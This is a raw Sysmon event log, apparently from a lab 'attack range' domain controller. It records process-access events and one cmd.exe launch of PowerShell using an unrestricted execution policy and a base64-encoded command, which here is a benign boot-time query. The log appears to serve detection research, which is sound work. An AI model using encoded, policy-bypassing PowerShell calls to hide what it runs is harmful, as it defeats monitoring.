08:40:28.071{5D479F2C-167C-5F84-1703-000000007E01}45764476C:\Windows\system32\conhost.exe{5D479F2C-167C-5F84-1903-000000007E01}5116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000603Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.071{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000602Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.071{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000601Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.071{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000600Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.071{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000599Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.071{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000598Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.071{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000597Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.071{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000596Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.071{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000595Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.071{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000594Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.071{5D479F2C-14FE-5F84-0500-000000007E01}640760C:\Windows\system32\csrss.exe{5D479F2C-167C-5F84-1903-000000007E01}5116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000593Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.071{5D479F2C-167C-5F84-1803-000000007E01}51004708C:\Windows\system32\cmd.exe{5D479F2C-167C-5F84-1903-000000007E01}5116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000592Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.083{5D479F2C-167C-5F84-1903-000000007E01}5116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-167C-5F84-1010-120000000000}0x1210100HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{5D479F2C-167C-5F84-1803-000000007E01}5100C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 10341000x8000000000000000591Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.071{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000590Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.071{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000589Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.071{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000588Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.071{5D479F2C-167C-5F84-1703-000000007E01}45764476C:\Windows\system32\conhost.exe{5D479F2C-167C-5F84-1803-000000007E01}5100C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000587Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.071{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000586Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.071{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000585Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.071{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000584Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.071{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000583Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.071{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000582Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.071{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000581Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.071{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000580Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.071{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000579Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 